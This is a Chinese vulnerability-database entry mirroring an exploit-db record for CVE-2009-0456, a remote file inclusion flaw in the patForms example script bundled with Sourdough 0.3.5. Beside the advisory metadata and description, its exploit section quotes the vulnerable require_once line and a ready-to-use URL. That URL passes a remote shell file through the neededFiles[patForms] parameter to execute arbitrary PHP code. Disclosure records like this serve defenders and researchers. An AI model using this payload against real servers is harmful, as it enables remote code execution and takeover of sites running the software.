https://www.exploit-db.com/exploits/7946
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-223
Sourdough 'examples/example_clientside_javascript.php' 远程文件包含漏洞






漏洞ID | 1117325 | 漏洞类型 | 代码注入 |
发布时间 | 2009-02-02 | 更新时间 | 2009-02-10 |
![]() |
CVE-2009-0456 | ![]() |
CNNVD-200902-223 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Sourdough是一个基于PHP5开发的应用广泛的WEB应用组件。patForms中的examples/example_clientside_javascript.php存在PHP远程文件包含漏洞。当在Sourdough0.3.5中使用时,远程攻击者可以借助neededFiles[patForms]参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:sourdough 0.3.5
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/s/so/sourdough/sourdough-0.3.5-alpha.zip
------------------------------------------------------------------
........................................................
vul: /thirdparty/patForms/examples/example_clientside_javascript.php line 32
require_once $neededFiles['patForms'];
------------------------------------------------------
-----------------------------------------------------
xpl:
http://127.0.0.1/thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=shell.txt?
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran]
---------------------------------------------------
# milw0rm.com [2009-02-02]
|参考资料
来源:BID
名称:33569
链接:http://www.securityfocus.com/bid/33569
来源:MILW0RM
名称:7946
链接:http://www.milw0rm.com/exploits/7946
检索漏洞
开始时间
结束时间